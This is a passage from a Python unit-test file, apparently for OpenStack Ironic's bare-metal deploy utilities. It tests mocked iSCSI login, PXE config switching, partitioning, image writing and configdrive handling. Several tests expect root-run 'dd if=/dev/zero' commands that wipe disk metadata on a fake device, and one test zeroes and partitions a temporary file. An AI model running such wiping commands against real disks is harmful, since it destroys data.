mock_os):\n iqn = \'iqn.xyz\'\n ip = ""127.0.0.1""\n port = ""22""\n check_dir = ""/dev/disk/by-path/ip-%s:%s-iscsi-%s-lun-1"" % (ip,\n port,\n iqn)\n\n mock_os.return_value = True\n utils.check_file_system_for_iscsi_device(ip, port, iqn)\n mock_os.assert_called_once_with(check_dir)\n\n @mock.patch.object(common_utils, \'execute\', autospec=True)\n def test_verify_iscsi_connection(self, mock_exec):\n iqn = \'iqn.xyz\'\n mock_exec.return_value = [\'iqn.xyz\', \'\']\n utils.verify_iscsi_connection(iqn)\n mock_exec.assert_called_once_with(\'iscsiadm\',\n \'-m\', \'node\',\n \'-S\',\n run_as_root=True,\n check_exit_code=[0])\n\n @mock.patch.object(common_utils, \'execute\', autospec=True)\n def test_force_iscsi_lun_update(self, mock_exec):\n iqn = \'iqn.xyz\'\n utils.force_iscsi_lun_update(iqn)\n mock_exec.assert_called_once_with(\'iscsiadm\',\n \'-m\', \'node\',\n \'-T\', iqn,\n \'-R\',\n run_as_root=True,\n check_exit_code=[0])\n\n @mock.patch.object(common_utils, \'execute\', autospec=True)\n @mock.patch.object(utils, \'verify_iscsi_connection\', autospec=True)\n @mock.patch.object(utils, \'force_iscsi_lun_update\', autospec=True)\n @mock.patch.object(utils, \'check_file_system_for_iscsi_device\',\n autospec=True)\n def test_login_iscsi_calls_verify_and_update(self,\n mock_check_dev,\n mock_update,\n mock_verify,\n mock_exec):\n address = \'127.0.0.1\'\n port = 3306\n iqn = \'iqn.xyz\'\n mock_exec.return_value = [\'iqn.xyz\', \'\']\n utils.login_iscsi(address, port, iqn)\n mock_exec.assert_called_once_with(\'iscsiadm\',\n \'-m\', \'node\',\n \'-p\', \'%s:%s\' % (address, port),\n \'-T\', iqn,\n \'--login\',\n run_as_root=True,\n check_exit_code=[0],\n attempts=5,\n delay_on_retry=True)\n\n mock_verify.assert_called_once_with(iqn)\n\n mock_update.assert_called_once_with(iqn)\n\n mock_check_dev.assert_called_once_with(address, port, iqn)\n\n @mock.patch.object(utils, \'is_block_device\', lambda d: True)\n def test_always_logout_and_delete_iscsi(self):\n """"""Check if logout_iscsi() and delete_iscsi() are called.\n\n Make sure that logout_iscsi() and delete_iscsi() are called once\n login_iscsi() is invoked.\n\n """"""\n address = \'127.0.0.1\'\n port = 3306\n iqn = \'iqn.xyz\'\n lun = 1\n image_path = \'/tmp/xyz/image\'\n root_mb = 128\n swap_mb = 64\n ephemeral_mb = 256\n ephemeral_format = \'exttest\'\n node_uuid = ""12345678-1234-1234-1234-1234567890abcxyz""\n\n dev = \'/dev/fake\'\n\n class TestException(Exception):\n pass\n\n name_list = [\'get_dev\', \'get_image_mb\', \'discovery\', \'login_iscsi\',\n \'logout_iscsi\', \'delete_iscsi\', \'work_on_disk\']\n patch_list = [mock.patch.object(utils, name,\n spec_set=types.FunctionType)\n for name in name_list]\n mock_list = [patcher.start() for patcher in patch_list]\n for patcher in patch_list:\n self.addCleanup(patcher.stop)\n\n parent_mock = mock.MagicMock(spec=[])\n for mocker, name in zip(mock_list, name_list):\n parent_mock.attach_mock(mocker, name)\n\n parent_mock.get_dev.return_value = dev\n parent_mock.get_image_mb.return_value = 1\n parent_mock.work_on_disk.side_effect = TestException\n calls_expected = [mock.call.get_image_mb(image_path),\n mock.call.get_dev(address, port, iqn, lun),\n mock.call.discovery(address, port),\n mock.call.login_iscsi(address, port, iqn),\n mock.call.work_on_disk(dev, root_mb, swap_mb,\n ephemeral_mb,\n ephemeral_format, image_path,\n node_uuid, configdrive=None,\n preserve_ephemeral=False,\n boot_option=""netboot"",\n boot_mode=""bios""),\n mock.call.logout_iscsi(address, port, iqn),\n 
mock.call.delete_iscsi(address, port, iqn)]\n\n self.assertRaises(TestException, utils.deploy_partition_image,\n address, port, iqn, lun, image_path,\n root_mb, swap_mb, ephemeral_mb, ephemeral_format,\n node_uuid)\n\n self.assertEqual(calls_expected, parent_mock.mock_calls)\n\n\nclass SwitchPxeConfigTestCase(tests_base.TestCase):\n\n def _create_config(self, ipxe=False, boot_mode=None):\n (fd, fname) = tempfile.mkstemp()\n if boot_mode == \'uefi\':\n pxe_cfg = _UEFI_PXECONF_DEPLOY\n else:\n pxe_cfg = _IPXECONF_DEPLOY if ipxe else _PXECONF_DEPLOY\n os.write(fd, pxe_cfg)\n os.close(fd)\n self.addCleanup(os.unlink, fname)\n return fname\n\n def test_switch_pxe_config_partition_image(self):\n boot_mode = \'bios\'\n fname = self._create_config()\n utils.switch_pxe_config(fname,\n \'12345678-1234-1234-1234-1234567890abcdef\',\n boot_mode,\n False)\n with open(fname, \'r\') as f:\n pxeconf = f.read()\n self.assertEqual(_PXECONF_BOOT_PARTITION, pxeconf)\n\n def test_switch_pxe_config_whole_disk_image(self):\n boot_mode = \'bios\'\n fname = self._create_config()\n utils.switch_pxe_config(fname,\n \'0x12345678\',\n boot_mode,\n True)\n with open(fname, \'r\') as f:\n pxeconf = f.read()\n self.assertEqual(_PXECONF_BOOT_WHOLE_DISK, pxeconf)\n\n def test_switch_ipxe_config_partition_image(self):\n boot_mode = \'bios\'\n cfg.CONF.set_override(\'ipxe_enabled\', True, \'pxe\')\n fname = self._create_config(ipxe=True)\n utils.switch_pxe_config(fname,\n \'12345678-1234-1234-1234-1234567890abcdef\',\n boot_mode,\n False)\n with open(fname, \'r\') as f:\n pxeconf = f.read()\n self.assertEqual(_IPXECONF_BOOT_PARTITION, pxeconf)\n\n def test_switch_ipxe_config_whole_disk_image(self):\n boot_mode = \'bios\'\n cfg.CONF.set_override(\'ipxe_enabled\', True, \'pxe\')\n fname = self._create_config(ipxe=True)\n utils.switch_pxe_config(fname,\n \'0x12345678\',\n boot_mode,\n True)\n with open(fname, \'r\') as f:\n pxeconf = f.read()\n self.assertEqual(_IPXECONF_BOOT_WHOLE_DISK, pxeconf)\n\n def test_switch_uefi_pxe_config_partition_image(self):\n boot_mode = \'uefi\'\n fname = self._create_config(boot_mode=boot_mode)\n utils.switch_pxe_config(fname,\n \'12345678-1234-1234-1234-1234567890abcdef\',\n boot_mode,\n False)\n with open(fname, \'r\') as f:\n pxeconf = f.read()\n self.assertEqual(_UEFI_PXECONF_BOOT_PARTITION, pxeconf)\n\n def test_switch_uefi_config_whole_disk_image(self):\n boot_mode = \'uefi\'\n fname = self._create_config(boot_mode=boot_mode)\n utils.switch_pxe_config(fname,\n \'0x12345678\',\n boot_mode,\n True)\n with open(fname, \'r\') as f:\n pxeconf = f.read()\n self.assertEqual(_UEFI_PXECONF_BOOT_WHOLE_DISK, pxeconf)\n\n\n@mock.patch(\'time.sleep\', lambda sec: None)\nclass OtherFunctionTestCase(db_base.DbTestCase):\n\n def setUp(self):\n super(OtherFunctionTestCase, self).setUp()\n mgr_utils.mock_the_extension_manager(driver=""fake_pxe"")\n self.node = obj_utils.create_test_node(self.context, driver=\'fake_pxe\')\n\n def test_get_dev(self):\n expected = \'/dev/disk/by-path/ip-127.0.0.1:5678-iscsi-iqn.fake-lun-9\'\n actual = utils.get_dev(\'127.0.0.1\', 5678, \'iqn.fake\', 9)\n self.assertEqual(expected, actual)\n\n @mock.patch.object(os, \'stat\', autospec=True)\n @mock.patch.object(stat, \'S_ISBLK\', autospec=True)\n def test_is_block_device_works(self, mock_is_blk, mock_os):\n device = \'/dev/disk/by-path/ip-127.0.0.1:5678-iscsi-iqn.fake-lun-9\'\n mock_is_blk.return_value = True\n mock_os().st_mode = 10000\n self.assertTrue(utils.is_block_device(device))\n 
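# stat.S_ISBLK must have been consulted with the st_mode taken from the\n # mocked os.stat() result.\n 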
mock_is_blk.assert_called_once_with(mock_os().st_mode)\n\n @mock.patch.object(os, \'stat\', autospec=True)\n def test_is_block_device_raises(self, mock_os):\n device = \'/dev/disk/by-path/ip-127.0.0.1:5678-iscsi-iqn.fake-lun-9\'\n mock_os.side_effect = OSError\n self.assertRaises(exception.InstanceDeployFailure,\n utils.is_block_device, device)\n mock_os.assert_has_calls([mock.call(device)] * 3)\n\n @mock.patch.object(os.path, \'getsize\', autospec=True)\n @mock.patch.object(images, \'converted_size\', autospec=True)\n def test_get_image_mb(self, mock_csize, mock_getsize):\n mb = 1024 * 1024\n\n mock_getsize.return_value = 0\n mock_csize.return_value = 0\n self.assertEqual(0, utils.get_image_mb(\'x\', False))\n self.assertEqual(0, utils.get_image_mb(\'x\', True))\n mock_getsize.return_value = 1\n mock_csize.return_value = 1\n self.assertEqual(1, utils.get_image_mb(\'x\', False))\n self.assertEqual(1, utils.get_image_mb(\'x\', True))\n mock_getsize.return_value = mb\n mock_csize.return_value = mb\n self.assertEqual(1, utils.get_image_mb(\'x\', False))\n self.assertEqual(1, utils.get_image_mb(\'x\', True))\n mock_getsize.return_value = mb + 1\n mock_csize.return_value = mb + 1\n self.assertEqual(2, utils.get_image_mb(\'x\', False))\n self.assertEqual(2, utils.get_image_mb(\'x\', True))\n\n def test_parse_root_device_hints(self):\n self.node.properties[\'root_device\'] = {\'wwn\': 123456}\n expected = \'wwn=123456\'\n result = utils.parse_root_device_hints(self.node)\n self.assertEqual(expected, result)\n\n def test_parse_root_device_hints_string_space(self):\n self.node.properties[\'root_device\'] = {\'model\': \'fake model\'}\n expected = \'model=fake%20model\'\n result = utils.parse_root_device_hints(self.node)\n self.assertEqual(expected, result)\n\n def test_parse_root_device_hints_no_hints(self):\n self.node.properties = {}\n result = utils.parse_root_device_hints(self.node)\n self.assertIsNone(result)\n\n def test_parse_root_device_hints_invalid_hints(self):\n self.node.properties[\'root_device\'] = {\'vehicle\': \'Owlship\'}\n self.assertRaises(exception.InvalidParameterValue,\n utils.parse_root_device_hints, self.node)\n\n def test_parse_root_device_hints_invalid_size(self):\n self.node.properties[\'root_device\'] = {\'size\': \'not-int\'}\n self.assertRaises(exception.InvalidParameterValue,\n utils.parse_root_device_hints, self.node)\n\n\n@mock.patch.object(disk_partitioner.DiskPartitioner, \'commit\', lambda _: None)\nclass WorkOnDiskTestCase(tests_base.TestCase):\n\n def setUp(self):\n super(WorkOnDiskTestCase, self).setUp()\n self.image_path = \'/tmp/xyz/image\'\n self.root_mb = 128\n self.swap_mb = 64\n self.ephemeral_mb = 0\n self.ephemeral_format = None\n self.configdrive_mb = 0\n self.dev = \'/dev/fake\'\n self.swap_part = \'/dev/fake-part1\'\n self.root_part = \'/dev/fake-part2\'\n\n self.mock_ibd_obj = mock.patch.object(\n utils, \'is_block_device\', autospec=True)\n self.mock_ibd = self.mock_ibd_obj.start()\n self.addCleanup(self.mock_ibd_obj.stop)\n self.mock_mp_obj = mock.patch.object(\n utils, \'make_partitions\', autospec=True)\n self.mock_mp = self.mock_mp_obj.start()\n self.addCleanup(self.mock_mp_obj.stop)\n self.mock_remlbl_obj = mock.patch.object(\n utils, \'destroy_disk_metadata\', autospec=True)\n self.mock_remlbl = self.mock_remlbl_obj.start()\n self.addCleanup(self.mock_remlbl_obj.stop)\n self.mock_mp.return_value = {\'swap\': self.swap_part,\n \'root\': self.root_part}\n\n def test_no_root_partition(self):\n self.mock_ibd.return_value = False\n 
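# Without a visible root block device the deploy must abort with\n # InstanceDeployFailure after the single is_block_device() probe below.\n 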
self.assertRaises(exception.InstanceDeployFailure,\n utils.work_on_disk, self.dev, self.root_mb,\n self.swap_mb, self.ephemeral_mb,\n self.ephemeral_format, self.image_path, \'fake-uuid\')\n self.mock_ibd.assert_called_once_with(self.root_part)\n self.mock_mp.assert_called_once_with(self.dev, self.root_mb,\n self.swap_mb, self.ephemeral_mb,\n self.configdrive_mb, commit=True,\n boot_option=""netboot"",\n boot_mode=""bios"")\n\n def test_no_swap_partition(self):\n self.mock_ibd.side_effect = iter([True, False])\n calls = [mock.call(self.root_part),\n mock.call(self.swap_part)]\n self.assertRaises(exception.InstanceDeployFailure,\n utils.work_on_disk, self.dev, self.root_mb,\n self.swap_mb, self.ephemeral_mb,\n self.ephemeral_format, self.image_path, \'fake-uuid\')\n self.assertEqual(self.mock_ibd.call_args_list, calls)\n self.mock_mp.assert_called_once_with(self.dev, self.root_mb,\n self.swap_mb, self.ephemeral_mb,\n self.configdrive_mb, commit=True,\n boot_option=""netboot"",\n boot_mode=""bios"")\n\n def test_no_ephemeral_partition(self):\n ephemeral_part = \'/dev/fake-part1\'\n swap_part = \'/dev/fake-part2\'\n root_part = \'/dev/fake-part3\'\n ephemeral_mb = 256\n ephemeral_format = \'exttest\'\n\n self.mock_mp.return_value = {\'ephemeral\': ephemeral_part,\n \'swap\': swap_part,\n \'root\': root_part}\n self.mock_ibd.side_effect = iter([True, True, False])\n calls = [mock.call(root_part),\n mock.call(swap_part),\n mock.call(ephemeral_part)]\n self.assertRaises(exception.InstanceDeployFailure,\n utils.work_on_disk, self.dev, self.root_mb,\n self.swap_mb, ephemeral_mb, ephemeral_format,\n self.image_path, \'fake-uuid\')\n self.assertEqual(self.mock_ibd.call_args_list, calls)\n self.mock_mp.assert_called_once_with(self.dev, self.root_mb,\n self.swap_mb, ephemeral_mb,\n self.configdrive_mb, commit=True,\n boot_option=""netboot"",\n boot_mode=""bios"")\n\n @mock.patch.object(common_utils, \'unlink_without_raise\', autospec=True)\n @mock.patch.object(utils, \'_get_configdrive\', autospec=True)\n def test_no_configdrive_partition(self, mock_configdrive, mock_unlink):\n mock_configdrive.return_value = (10, \'fake-path\')\n swap_part = \'/dev/fake-part1\'\n configdrive_part = \'/dev/fake-part2\'\n root_part = \'/dev/fake-part3\'\n configdrive_url = \'http://127.0.0.1/cd\'\n configdrive_mb = 10\n\n self.mock_mp.return_value = {\'swap\': swap_part,\n \'configdrive\': configdrive_part,\n \'root\': root_part}\n self.mock_ibd.side_effect = iter([True, True, False])\n calls = [mock.call(root_part),\n mock.call(swap_part),\n mock.call(configdrive_part)]\n self.assertRaises(exception.InstanceDeployFailure,\n utils.work_on_disk, self.dev, self.root_mb,\n self.swap_mb, self.ephemeral_mb,\n self.ephemeral_format, self.image_path, \'fake-uuid\',\n preserve_ephemeral=False,\n configdrive=configdrive_url,\n boot_option=""netboot"")\n self.assertEqual(self.mock_ibd.call_args_list, calls)\n self.mock_mp.assert_called_once_with(self.dev, self.root_mb,\n self.swap_mb, self.ephemeral_mb,\n configdrive_mb, commit=True,\n boot_option=""netboot"",\n boot_mode=""bios"")\n mock_unlink.assert_called_once_with(\'fake-path\')\n\n\n@mock.patch.object(common_utils, \'execute\', autospec=True)\nclass MakePartitionsTestCase(tests_base.TestCase):\n\n def setUp(self):\n super(MakePartitionsTestCase, self).setUp()\n self.dev = \'fake-dev\'\n self.root_mb = 1024\n self.swap_mb = 512\n self.ephemeral_mb = 0\n self.configdrive_mb = 0\n self.parted_static_cmd = [\'parted\', \'-a\', \'optimal\', \'-s\', self.dev,\n \'--\', \'unit\', 
\'MiB\', \'mklabel\', \'msdos\']\n\n def _test_make_partitions(self, mock_exc, boot_option):\n mock_exc.return_value = (None, None)\n utils.make_partitions(self.dev, self.root_mb, self.swap_mb,\n self.ephemeral_mb, self.configdrive_mb,\n boot_option=boot_option)\n\n expected_mkpart = [\'mkpart\', \'primary\', \'linux-swap\', \'1\', \'513\',\n \'mkpart\', \'primary\', \'\', \'513\', \'1537\']\n if boot_option == ""local"":\n expected_mkpart.extend([\'set\', \'2\', \'boot\', \'on\'])\n parted_cmd = self.parted_static_cmd + expected_mkpart\n parted_call = mock.call(*parted_cmd, run_as_root=True,\n check_exit_code=[0])\n fuser_cmd = [\'fuser\', \'fake-dev\']\n fuser_call = mock.call(*fuser_cmd, run_as_root=True,\n check_exit_code=[0, 1])\n mock_exc.assert_has_calls([parted_call, fuser_call])\n\n def test_make_partitions(self, mock_exc):\n self._test_make_partitions(mock_exc, boot_option=""netboot"")\n\n def test_make_partitions_local_boot(self, mock_exc):\n self._test_make_partitions(mock_exc, boot_option=""local"")\n\n def test_make_partitions_with_ephemeral(self, mock_exc):\n self.ephemeral_mb = 2048\n expected_mkpart = [\'mkpart\', \'primary\', \'\', \'1\', \'2049\',\n \'mkpart\', \'primary\', \'linux-swap\', \'2049\', \'2561\',\n \'mkpart\', \'primary\', \'\', \'2561\', \'3585\']\n cmd = self.parted_static_cmd + expected_mkpart\n mock_exc.return_value = (None, None)\n utils.make_partitions(self.dev, self.root_mb, self.swap_mb,\n self.ephemeral_mb, self.configdrive_mb)\n\n parted_call = mock.call(*cmd, run_as_root=True, check_exit_code=[0])\n mock_exc.assert_has_calls([parted_call])\n\n\n@mock.patch.object(utils, \'get_dev_block_size\', autospec=True)\n@mock.patch.object(common_utils, \'execute\', autospec=True)\nclass DestroyMetaDataTestCase(tests_base.TestCase):\n\n def setUp(self):\n super(DestroyMetaDataTestCase, self).setUp()\n self.dev = \'fake-dev\'\n self.node_uuid = ""12345678-1234-1234-1234-1234567890abcxyz""\n\n def test_destroy_disk_metadata(self, mock_exec, mock_gz):\n mock_gz.return_value = 64\n expected_calls = [mock.call(\'dd\', \'if=/dev/zero\', \'of=fake-dev\',\n \'bs=512\', \'count=36\', run_as_root=True,\n check_exit_code=[0]),\n mock.call(\'dd\', \'if=/dev/zero\', \'of=fake-dev\',\n \'bs=512\', \'count=36\', \'seek=28\',\n run_as_root=True,\n check_exit_code=[0])]\n utils.destroy_disk_metadata(self.dev, self.node_uuid)\n mock_exec.assert_has_calls(expected_calls)\n self.assertTrue(mock_gz.called)\n\n def test_destroy_disk_metadata_get_dev_size_fail(self, mock_exec, mock_gz):\n mock_gz.side_effect = processutils.ProcessExecutionError\n\n expected_call = [mock.call(\'dd\', \'if=/dev/zero\', \'of=fake-dev\',\n \'bs=512\', \'count=36\', run_as_root=True,\n check_exit_code=[0])]\n self.assertRaises(processutils.ProcessExecutionError,\n utils.destroy_disk_metadata,\n self.dev,\n self.node_uuid)\n mock_exec.assert_has_calls(expected_call)\n\n def test_destroy_disk_metadata_dd_fail(self, mock_exec, mock_gz):\n mock_exec.side_effect = processutils.ProcessExecutionError\n\n expected_call = [mock.call(\'dd\', \'if=/dev/zero\', \'of=fake-dev\',\n \'bs=512\', \'count=36\', run_as_root=True,\n check_exit_code=[0])]\n self.assertRaises(processutils.ProcessExecutionError,\n utils.destroy_disk_metadata,\n self.dev,\n self.node_uuid)\n mock_exec.assert_has_calls(expected_call)\n self.assertFalse(mock_gz.called)\n\n\n@mock.patch.object(common_utils, \'execute\', autospec=True)\nclass GetDeviceBlockSizeTestCase(tests_base.TestCase):\n\n def setUp(self):\n super(GetDeviceBlockSizeTestCase, 
self).setUp()\n self.dev = \'fake-dev\'\n self.node_uuid = ""12345678-1234-1234-1234-1234567890abcxyz""\n\n def test_get_dev_block_size(self, mock_exec):\n mock_exec.return_value = (""64"", """")\n expected_call = [mock.call(\'blockdev\', \'--getsz\', self.dev,\n run_as_root=True, check_exit_code=[0])]\n utils.get_dev_block_size(self.dev)\n mock_exec.assert_has_calls(expected_call)\n\n\n@mock.patch.object(utils, \'dd\', autospec=True)\n@mock.patch.object(images, \'qemu_img_info\', autospec=True)\n@mock.patch.object(images, \'convert_image\', autospec=True)\nclass PopulateImageTestCase(tests_base.TestCase):\n\n def setUp(self):\n super(PopulateImageTestCase, self).setUp()\n\n def test_populate_raw_image(self, mock_cg, mock_qinfo, mock_dd):\n type(mock_qinfo.return_value).file_format = mock.PropertyMock(\n return_value=\'raw\')\n utils.populate_image(\'src\', \'dst\')\n mock_dd.assert_called_once_with(\'src\', \'dst\')\n self.assertFalse(mock_cg.called)\n\n def test_populate_qcow2_image(self, mock_cg, mock_qinfo, mock_dd):\n type(mock_qinfo.return_value).file_format = mock.PropertyMock(\n return_value=\'qcow2\')\n utils.populate_image(\'src\', \'dst\')\n mock_cg.assert_called_once_with(\'src\', \'dst\', \'raw\', True)\n self.assertFalse(mock_dd.called)\n\n\n@mock.patch.object(utils, \'is_block_device\', lambda d: True)\n@mock.patch.object(utils, \'block_uuid\', lambda p: \'uuid\')\n@mock.patch.object(utils, \'dd\', lambda *_: None)\n@mock.patch.object(images, \'convert_image\', lambda *_: None)\n@mock.patch.object(common_utils, \'mkfs\', lambda *_: None)\n# NOTE(dtantsur): destroy_disk_metadata resets file size, disabling it\n@mock.patch.object(utils, \'destroy_disk_metadata\', lambda *_: None)\nclass RealFilePartitioningTestCase(tests_base.TestCase):\n """"""This test applies some real-world partitioning scenario to a file.\n\n This test covers the whole partitioning, mocking everything not possible\n on a file. 
That helps us make sure that we do all the partitioning math properly\n and also serves as an integration test of DiskPartitioner.\n """"""\n\n def setUp(self):\n super(RealFilePartitioningTestCase, self).setUp()\n # NOTE(dtantsur): no parted utility on gate-ironic-python26\n try:\n common_utils.execute(\'parted\', \'--version\')\n except OSError as exc:\n self.skipTest(\'parted utility was not found: %s\' % exc)\n self.file = tempfile.NamedTemporaryFile(delete=False)\n # NOTE(ifarkas): the file needs to be closed, so fuser won\'t report\n # any usage\n self.file.close()\n # NOTE(dtantsur): 20 MiB file with zeros\n common_utils.execute(\'dd\', \'if=/dev/zero\', \'of=%s\' % self.file.name,\n \'bs=1\', \'count=0\', \'seek=20MiB\')\n\n @staticmethod\n def _run_without_root(func, *args, **kwargs):\n """"""Make sure root is not required when using utils.execute.""""""\n real_execute = common_utils.execute\n\n def fake_execute(*cmd, **kwargs):\n kwargs[\'run_as_root\'] = False\n return real_execute(*cmd, **kwargs)\n\n with mock.patch.object(common_utils, \'execute\', fake_execute):\n return func(*args, **kwargs)\n\n def test_different_sizes(self):\n # NOTE(dtantsur): Keep this list in order with expected partitioning\n fields = [\'ephemeral_mb\', \'swap_mb\', \'root_mb\']\n variants = ((0, 0, 12), (4, 2, 8), (0, 4, 10), (5, 0, 10))\n for variant in variants:\n kwargs = dict(zip(fields, variant))\n self._run_without_root(utils.work_on_disk, self.file.name,\n ephemeral_format=\'ext4\', node_uuid=\'\',\n image_path=\'path\', **kwargs)\n part_table = self._run_without_root(\n disk_partitioner.list_partitions, self.file.name)\n for part, expected_size in zip(part_table, filter(None, variant)):\n self.assertEqual(expected_size, part[\'size\'],\n ""comparison failed for %s"" % list(variant))\n\n def test_whole_disk(self):\n # 6 MiB ephemeral + 3 MiB swap + 9 MiB root + 1 MiB for MBR\n # + 1 MiB MAGIC == 20 MiB whole disk\n # TODO(dtantsur): figure out why we need \'magic\' 1 more MiB\n # and why the size is different on Ubuntu and Fedora (see below)\n self._run_without_root(utils.work_on_disk, self.file.name,\n root_mb=9, ephemeral_mb=6, swap_mb=3,\n ephemeral_format=\'ext4\', node_uuid=\'\',\n image_path=\'path\')\n part_table = self._run_without_root(\n disk_partitioner.list_partitions, self.file.name)\n sizes = [part[\'size\'] for part in part_table]\n # NOTE(dtantsur): parted in Ubuntu 12.04 will occupy the last MiB,\n # parted in Fedora 20 won\'t - thus two possible variants for last part\n self.assertEqual([6, 3], sizes[:2],\n ""unexpected partitioning %s"" % part_table)\n self.assertIn(sizes[2], (9, 10))\n\n @mock.patch.object(image_cache, \'clean_up_caches\', autospec=True)\n def test_fetch_images(self, mock_clean_up_caches):\n\n mock_cache = mock.MagicMock(\n spec_set=[\'fetch_image\', \'master_dir\'], master_dir=\'master_dir\')\n utils.fetch_images(None, mock_cache, [(\'uuid\', \'path\')])\n mock_clean_up_caches.assert_called_once_with(None, \'master_dir\',\n [(\'uuid\', \'path\')])\n mock_cache.fetch_image.assert_called_once_with(\'uuid\', \'path\',\n ctx=None,\n force_raw=True)\n\n @mock.patch.object(image_cache, \'clean_up_caches\', autospec=True)\n def test_fetch_images_fail(self, mock_clean_up_caches):\n\n exc = exception.InsufficientDiskSpace(path=\'a\',\n required=2,\n actual=1)\n\n mock_cache = mock.MagicMock(\n spec_set=[\'master_dir\'], master_dir=\'master_dir\')\n mock_clean_up_caches.side_effect = iter([exc])\n self.assertRaises(exception.InstanceDeployFailure,\n utils.fetch_images,\n None,\n 
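# NOTE: None here is the request context; fetch_images forwards it\n # to the image cache as ctx\n 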
mock_cache,\n [(\'uuid\', \'path\')])\n mock_clean_up_caches.assert_called_once_with(None, \'master_dir\',\n [(\'uuid\', \'path\')])\n\n\n@mock.patch.object(shutil, \'copyfileobj\', autospec=True)\n@mock.patch.object(requests, \'get\', autospec=True)\nclass GetConfigdriveTestCase(tests_base.TestCase):\n\n @mock.patch.object(gzip, \'GzipFile\', autospec=True)\n def test_get_configdrive(self, mock_gzip, mock_requests, mock_copy):\n mock_requests.return_value = mock.MagicMock(\n spec_set=[\'content\'], content=\'Zm9vYmFy\')\n utils._get_configdrive(\'http://127.0.0.1/cd\', \'fake-node-uuid\')\n mock_requests.assert_called_once_with(\'http://127.0.0.1/cd\')\n mock_gzip.assert_called_once_with(\'configdrive\', \'rb\',\n fileobj=mock.ANY)\n mock_copy.assert_called_once_with(mock.ANY, mock.ANY)\n\n @mock.patch.object(gzip, \'GzipFile\', autospec=True)\n def test_get_configdrive_base64_string(self, mock_gzip, mock_requests,\n mock_copy):\n utils._get_configdrive(\'Zm9vYmFy\', \'fake-node-uuid\')\n self.assertFalse(mock_requests.called)\n mock_gzip.assert_called_once_with(\'configdrive\', \'rb\',\n fileobj=mock.ANY)\n mock_copy.assert_called_once_with(mock.ANY, mock.ANY)\n\n def test_get_configdrive_bad_url(self, mock_requests, mock_copy):\n mock_requests.side_effect = requests.exceptions.RequestException\n self.assertRaises(exception.InstanceDeployFailure,\n utils._get_configdrive, \'http://127.0.0.1/cd\',\n \'fake-node-uuid\')\n self.assertFalse(mock_copy.called)\n\n @mock.patch.object(base64, \'b64decode\', autospec=True)\n def test_get_configdrive_base64_error(self, mock_b64, mock_requests,\n mock_copy):\n mock_b64.side_effect = TypeError\n self.assertRaises(exception.InstanceDeployFailure,\n utils._get_configdrive,\n \'malformed\', \'fake-node-uuid\')\n mock_b64.assert_called_once_with(\'malformed\')\n self.assertFalse(mock_copy.called)\n\n @mock.patch.object(gzip, \'GzipFile\', autospec=True)\n def test_get_configdrive_gzip_error(self, mock_gzip, mock_requests,\n mock_copy):\n mock_requests.return_value = mock.MagicMock(\n spec_set=[\'content\'], content=\'Zm9vYmFy\')\n mock_copy.side_effect = IOError\n self.assertRaises(exception.InstanceDeployFailure,\n utils._get_configdrive, \'http://127.0.0.1/cd\',\n \'fake-node-uuid\')\n mock_requests.assert_called_once_with(\'http://127.0.0.1/cd\')\n mock_gzip.assert_called_once_with(\'configdrive\', \'rb\',\n fileobj=mock.ANY)\n mock_copy.assert_called_once_with(mock.ANY, mock.ANY)\n\n\nclass VirtualMediaDeployUtilsTestCase(db_base.DbTestCase):\n\n def setUp(self):\n super(VirtualMediaDeployUtilsTestCase, self).setUp()\n mgr_utils.mock_the_extension_manager(driver=""iscsi_ilo"")\n info_dict = db_utils.get_test_ilo_info()\n self.node = obj_utils.create_test_node(self.context,\n driver=\'iscsi_ilo\', driver_info=info_dict)\n\n def test_get_single_nic_with_vif_port_id(self):\n obj_utils.create_test_port(self.context, node_id=self.node.id,\n address=\'aa:bb:cc\', uuid=uuidutils.generate_uuid(),\n extra={\'vif_port_id\': \'test-vif-A\'}, driver=\'iscsi_ilo\')\n with task_manager.acquire(self.context, self.node.uuid,\n shared=False) as task:\n address = utils.get_single_nic_with_vif_port_id(task)\n self.assertEqual(\'aa:bb:cc\', address)\n\n\nclass ParseInstanceInfoCapabilitiesTestCase(tests_base.TestCase):\n\n def setUp(self):\n super(ParseInstanceInfoCapabilitiesTestCase, self).setUp()\n self.node = obj_utils.get_test_node(self.context, driver=\'fake\')\n\n def test_parse_instance_info_capabilities_string(self):\n self.node.instance_info = 
{\'capabilities\': \'{""cat"": ""meow""}\'}\n expected_result = {""cat"": ""meow""}\n result = utils.parse_instance_info_capabilities(self.node)\n self.assertEqual(expected_result, result)\n\n def test_parse_instance_info_capabilities(self):\n self.node.instance_info = {\'capabilities\': {""dog"": ""wuff""}}\n expected_result = {""dog"": ""wuff""}\n result = utils.parse_instance_info_capabilities(self.node)\n self.assertEqual(expected_result, result)\n\n def test_parse_instance_info_invalid_type(self):\n self.node.instance_info = {\'capabilities\': \'not-a-dict\'}\n self.assertRaises(exception.InvalidParameterValue,\n utils.parse_instance_info_capabilities, self.node)\n\n def test_is_secure_boot_requested_true(self):\n self.node.instance_info = {\'capabilities\': {""secure_boot"": ""tRue""}}\n self.assertTrue(utils.is_secure_boot_requested(self.node))\n\n def test_is_secure_boot_requested_false(self):\n self.node.instance_info = {\'capabilities\': {""secure_boot"": ""false""}}\n self.assertFalse(utils.is_secure_boot_requested(self.node))\n\n def test_is_secure_boot_requested_invalid(self):\n self.node.instance_info = {\'capabilities\': {""secure_boot"": ""invalid""}}\n self.assertFalse(utils.is_secure_boot_requested(self.node))\n\n def test_get_boot_mode_for_deploy_using_capabilities(self):\n properties = {\'capabilities\': \'boot_mode:uefi,cap2:value2\'}\n self.node.properties = properties\n\n result = utils.get_boot_mode_for_deploy(self.node)\n self.assertEqual(\'uefi\', result)\n\n def test_get_boot_mode_for_deploy_using_instance_info_cap(self):\n instance_info = {\'capabilities\': {\'secure_boot\': \'True\'}}\n self.node.instance_info = instance_info\n\n result = utils.get_boot_mode_for_deploy(self.node)\n self.assertEqual(\'uefi\', result)\n\n def test_get_boot_mode_for_deploy_using_instance_info(self):\n instance_info = {\'deploy_boot_mode\': \'bios\'}\n self.node.instance_info = instance_info\n\n result = utils.get_boot_mode_for_deploy(self.node)\n self.assertEqual(\'bios\', result)\n\n\nclass TrySetBootDeviceTestCase(db_base.DbTestCase):\n\n def setUp(self):\n super(TrySetBootDeviceTestCase, self).setUp()\n mgr_utils.mock_the_extension_manager(driver=""fake"")\n self.node = obj_utils.create_test_node(self.context, driver=""fake"")\n\n @mock.patch.object(manager_utils, \'node_set_boot_device\', autospec=True)\n def test_try_set_boot_device_okay(self, node_set_boot_device_mock):\n with task_manager.acquire(self.context, self.node.uuid,\n shared=False) as task:\n utils.try_set_boot_device(task, 